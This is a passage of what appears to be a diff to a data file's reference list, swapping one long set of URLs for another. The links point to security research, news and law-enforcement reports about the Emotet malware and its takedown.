"https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/", - "https://experience.mandiant.com/trending-evil-2/p/1", - "https://www.youtube.com/watch?v=AkZ5TYBqcU4", - "https://spamauditor.org/2020/10/the-many-faces-of-emotet/", - "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://www.lac.co.jp/lacwatch/people/20201106_002321.html", - "https://isc.sans.edu/diary/rss/28254", - "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf", - "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction", - "https://twitter.com/Cryptolaemus1/status/1516535343281025032", - "https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/", - "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", - "https://feodotracker.abuse.ch/?filter=version_e", - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/", - "https://www.proofpoint.com/us/blog/threat-insight/geofenced-amazon-japan-credential-phishing-volumes-rival-emotet", - "https://twitter.com/milkr3am/status/1354459859912192002", - "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", - "https://www.secureworks.com/research/threat-profiles/gold-crestwood", - "https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/", - "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/", - "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers", - "https://hello.global.ntt/en-us/insights/blog/emotet-disruption-europol-counterattack", - "https://www.tagesschau.de/investigativ/br-recherche/emotet-schadsoftware-103.html", - "https://www.deepinstinct.com/2020/10/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before-part-2/", - "https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/", - "https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/", - "https://paste.cryptolaemus.com", - "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", - "https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html", - "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", - "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/", - "https://hello.global.ntt/en-us/insights/blog/shellbot-victim-overlap-with-emotet-network-infrastructure", - "https://www.politie.nl/nieuws/2021/februari/17/politie-bestrijdt-cybercrime-via-nederlandse-infrastructuur.html", - "https://cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/", - "https://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html", - "https://www.digitalshadows.com/blog-and-research/emotet-disruption/", - "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://medium.com/@Ilandu/emotet-unpacking-35bbe2980cfb", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://www.bleepingcomputer.com/news/security/emotet-malware-attacks-return-after-three-month-break/", - "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", - "https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/", - "https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation", - "https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one", - "https://cyber.wtf/2022/03/23/what-the-packer/", - "https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html", - "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://www.blueliv.com/blog/research/where-is-emotet-latest-geolocation-data/", - "https://www.dsih.fr/article/4483/emotet-de-retour-poc-exchange-0-day-windows-a-quelle-sauce-les-attaquants-prevoient-de-nous-manger-cette-semaine.html", - "https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf", - "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html", - "https://www.lac.co.jp/lacwatch/alert/20211119_002801.html", - "https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware", - "https://www.bitsight.com/blog/emotet-smb-spreader-back", - "https://www.zscaler.com/blogs/security-research/return-emotet-malware", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://forensicitguy.github.io/shortcut-to-emotet-ttp-change/", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html", - "https://twitter.com/ContiLeaks/status/1498614197202079745", - "https://www.atomicmatryoshka.com/post/malware-headliners-emotet", - "https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/", - "https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled", - "https://d00rt.github.io/emotet_network_protocol/", - "https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", - "https://kienmanowar.wordpress.com/2022/01/23/quicknote-emotet-epoch4-epoch5-tactics/", - "https://www.proofpoint.com/us/blog/threat-insight/emotet-tests-new-delivery-techniques", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", - "https://www.cert.pl/en/news/single/whats-up-emotet/", - "https://www.fortinet.com/blog/threat-research/deep-dive-into-emotet-malware.html", - "https://www.kroll.com/en/insights/publications/cyber/monitor/emotet-analysis-new-lnk-in-the-infection-chain", - "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return", - "https://www.youtube.com/watch?v=_mGMJFNJWSk", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html", - "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://securelist.com/financial-cyberthreats-in-2020/101638/", - "https://team-cymru.com/blog/2021/01/27/taking-down-emotet/", - "https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/", - "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmwcb-report-modern-bank-heists-2020.pdf", - "https://www.hornetsecurity.com/en/threat-research/emotet-botnet-takedown/", - "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/", - "https://isc.sans.edu/diary/28044", - "https://community.riskiq.com/article/2cd1c003", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/emotet-adds-new-evasion-technique-and-uses-connected-devices-as-proxy-cc-servers/", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", - "https://blog.cyble.com/2022/04/27/emotet-returns-with-new-ttps-and-delivers-lnk-files-to-its-victims/", - "https://www.bleepingcomputer.com/news/security/emotet-malware-is-back-and-rebuilding-its-botnet-via-trickbot/", - "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", - "https://www.trendmicro.com/en_no/research/23/c/emotet-returns-now-adopts-binary-padding-for-evasion.html", - "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", - "https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/", - "https://forensicitguy.github.io/emotet-excel4-macro-analysis/", "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html", - "https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/", - "https://threatresearch.ext.hp.com/emotets-return-whats-different/", - "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", - "https://isc.sans.edu/forums/diary/Emotet+Stops+Using+0000+in+Spambot+Traffic/28270/", - "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", - "https://www.jpcert.or.jp/english/at/2019/at190044.html", - "https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/", - "https://www.netresec.com/?page=Blog&month=2022-05&post=Emotet-C2-and-Spam-Traffic-Video", - "https://blog.lumen.com/emotet-redux/", - "https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/", - "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/", - "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://adalogics.com/blog/the-state-of-advanced-code-injections", "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", - "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/", - "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", - "https://www.youtube.com/watch?v=EyDiIAt__dI", - "https://muha2xmad.github.io/unpacking/emotet-part-2/", - "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/", - "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", - "https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", - "https://isc.sans.edu/diary/rss/27036", - "http://ropgadget.com/posts/defensive_pcres.html", - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/", - "https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.trendmicro.com/en_us/research/22/a/emotet-spam-abuses-unconventional-ip-address-formats-spread-malware.html", - "https://kienmanowar.wordpress.com/2022/12/19/z2abimonthly-malware-challege-emotet-back-from-the-dead/", - "https://www.youtube.com/watch?v=_BLOmClsSpc", - "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles", - "https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/", - "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/", - "https://blogs.vmware.com/security/2022/03/emotet-c2-configuration-extraction-and-analysis.html", - "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", - "https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection", - "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/", - "https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/", + "https://www.jpcert.or.jp/english/at/2019/at190044.html", + "https://www.proofpoint.com/us/blog/threat-insight/geofenced-amazon-japan-credential-phishing-volumes-rival-emotet", + "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage", + "https://cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/", + "https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/", + "https://www.youtube.com/watch?v=5_-oR_135ss", + "https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", "https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/", - "https://blogs.vmware.com/networkvirtualization/2022/02/emotet-is-not-dead-yet-part-2.html/", - "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/", - "https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5", - "https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak", - "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", + "https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/", + "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/", + "https://muha2xmad.github.io/unpacking/emotet-part-2/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns", - "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/", - "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/", - "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69", - "https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware", + "https://blogs.cisco.com/security/emotet-is-back", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/", + "https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/", + "https://blogs.vmware.com/security/2022/03/emotet-c2-configuration-extraction-and-analysis.html", + "https://www.bitsight.com/blog/emotet-smb-spreader-back", + "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", + "https://hatching.io/blog/powershell-analysis", + "https://www.hornetsecurity.com/en/threat-research/emotet-botnet-takedown/", + "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/", + "https://www.hornetsecurity.com/en/security-information/emotet-is-back/", + "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", + "https://www.proofpoint.com/us/blog/threat-insight/emotet-makes-timely-adoption-political-and-elections-lures", + "https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/", + "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", + "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol", + "https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action", + "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html", + "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", + "https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/", + "https://www.lac.co.jp/lacwatch/alert/20211119_002801.html", + "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", + "https://cyber.wtf/2021/11/15/guess-whos-back/", + "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903", + "https://speakerdeck.com/fr0gger/x-ray-of-malware-evasion-techniques-analysis-dissection-cure", + "https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/", + "https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.zscaler.com/blogs/security-research/return-emotet-malware", + "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", - "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return", + "https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation", + "https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/", + "https://asec.ahnlab.com/en/33600/", + "https://isc.sans.edu/diary/28044", + "https://www.ironnet.com/blog/detecting-a-mummyspider-campaign-and-emotet-infection", + "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://isc.sans.edu/diary/rss/28254", + "https://blogs.vmware.com/networkvirtualization/2022/01/emotet-is-not-dead-yet.html/", + "https://intel471.com/blog/emotet-takedown-2021/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://www.zscaler.com/blogs/security-research/return-emotet-malware-analysis", + "https://blogs.vmware.com/networkvirtualization/2022/02/emotet-is-not-dead-yet-part-2.html/", + "https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/", + "https://www.hornetsecurity.com/en/threat-research/comeback-emotet/", + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", + "https://www.welivesecurity.com/2023/07/06/whats-up-with-emotet/", + "https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/", + "https://threatpost.com/emotet-spreading-malicious-excel-files/178444/", + "https://unit42.paloaltonetworks.com/emotet-command-and-control/", + "https://www.inde.nz/blog/analysis-of-the-latest-wave-of-emotet-malicious-documents", + "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-one-592612", + "https://www.netskope.com/blog/emotet-still-abusing-microsoft-office-macros", + "https://www.secureworks.com/research/threat-profiles/gold-crestwood", + "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", + "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", + "http://ropgadget.com/posts/defensive_pcres.html", + "https://www.deepinstinct.com/blog/the-re-emergence-of-emotet", + "https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", + "https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/", + "https://d00rt.github.io/emotet_network_protocol/", + "https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728", + "https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates", "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1", + "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf", + "https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/", + "https://www.tagesschau.de/investigativ/br-recherche/emotet-schadsoftware-103.html", + "https://github.com/d00rt/emotet_research", + "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", + "https://www.bitsight.com/blog/emotet-botnet-rises-again", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://www.dsih.fr/article/4483/emotet-de-retour-poc-exchange-0-day-windows-a-quelle-sauce-les-attaquants-prevoient-de-nous-manger-cette-semaine.html", + "https://www.esentire.com/security-advisories/emotet-activity-identified", + "https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion", + "https://paste.cryptolaemus.com", + "https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/", + "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/", + "https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment", + "https://www.wiwo.de/my/technologie/digitale-welt/emotet-netzwerk-wie-eines-der-groessten-hacker-netzwerke-der-welt-lahmgelegt-wurde/27164048.html", + "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", + "https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/", + "https://www.cert.pl/en/news/single/whats-up-emotet/", + "https://www.youtube.com/watch?v=_mGMJFNJWSk", + "https://threatresearch.ext.hp.com/emotets-return-whats-different/", + "https://isc.sans.edu/forums/diary/Emotet+Stops+Using+0000+in+Spambot+Traffic/28270/", + "https://forensicitguy.github.io/shortcut-to-emotet-ttp-change/", + "https://www.fortinet.com/blog/threat-research/deep-dive-into-emotet-malware.html", + "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf", + "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers", + "https://unit42.paloaltonetworks.com/new-emotet-infection-method/", + "https://medium.com/threat-intel/emotet-dangerous-malware-keeps-on-evolving-ac84aadbb8de", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", + "https://twitter.com/milkr3am/status/1354459859912192002", + "https://www.youtube.com/watch?v=8PHCZdpNKrw", + "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/", + "https://www.netresec.com/?page=Blog&month=2022-05&post=Emotet-C2-and-Spam-Traffic-Video", + "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", + "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/", + "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", + "https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/", + "https://forensicitguy.github.io/emotet-excel4-macro-analysis/", + "https://github.com/mauronz/binja-emotet", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf", + "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/", + "https://twitter.com/raashidbhatt/status/1237853549200936960", + "https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack", + "https://spamauditor.org/2020/10/the-many-faces-of-emotet/", + "https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled", + "https://www.vmware.com/content/dam/learn/en/amer/fy23/pdf/1669005_Emotet_Exposed_A_Look_Inside_the_Cybercriminal_Supply_Chain.pdf", + "https://www.fortinet.com/blog/threat-research/ms-office-files-involved-again-in-recent-emotet-trojan-campaign-part-ii", + "https://www.cronup.com/la-botnet-de-emotet-reinicia-ataques-en-chile-y-latinoamerica/", + "https://notes.netbytesec.com/2021/02/deobfuscating-emotet-macro-and.html", + "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", + "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/emotet-adds-new-evasion-technique-and-uses-connected-devices-as-proxy-cc-servers/", + "https://isc.sans.edu/diary/rss/27036", + "https://kienmanowar.wordpress.com/2022/12/19/z2abimonthly-malware-challege-emotet-back-from-the-dead/", + "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-emotets-use-of-cryptography/", + "https://www.bleepingcomputer.com/news/security/emotet-botnet-switches-to-64-bit-modules-increases-activity/", + "https://therecord.media/over-780000-email-accounts-compromised-by-emotet-have-been-secured/", + "https://kienmanowar.wordpress.com/2022/01/23/quicknote-emotet-epoch4-epoch5-tactics/", + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html", + "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://www.youtube.com/watch?v=AkZ5TYBqcU4", + "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships", + "https://unit42.paloaltonetworks.com/domain-parking/", + "https://medium.com/@Ilandu/emotet-unpacking-35bbe2980cfb", + "https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html", + "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/", + "https://blog.talosintelligence.com/2020/11/emotet-2020.html", + "https://www.netskope.com/blog/netskope-threat-coverage-the-return-of-emotet", + "https://hello.global.ntt/en-us/insights/blog/emotet-disruption-europol-counterattack", + "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", + "https://www.kroll.com/en/insights/publications/cyber/monitor/emotet-analysis-new-lnk-in-the-infection-chain", + "https://www.gdatasoftware.com/blog/2022/01/malware-vaccines", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/", + "https://blog.lumen.com/emotet-redux/", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://www.digitalshadows.com/blog-and-research/emotet-disruption/", + "https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/", + "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", + "https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/", + "https://www.atomicmatryoshka.com/post/malware-headliners-emotet", + "https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/", + "https://blog.nviso.eu/2022/03/23/hunting-emotet-campaigns-with-kusto/", + "https://www.us-cert.gov/ncas/alerts/TA18-201A", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://pl-v.github.io/plv/posts/Emotet-unpacking/", + "https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://blog.talosintelligence.com/emotet-switches-to-onenote/", + "https://unit42.paloaltonetworks.com/emotet-thread-hijacking/", + 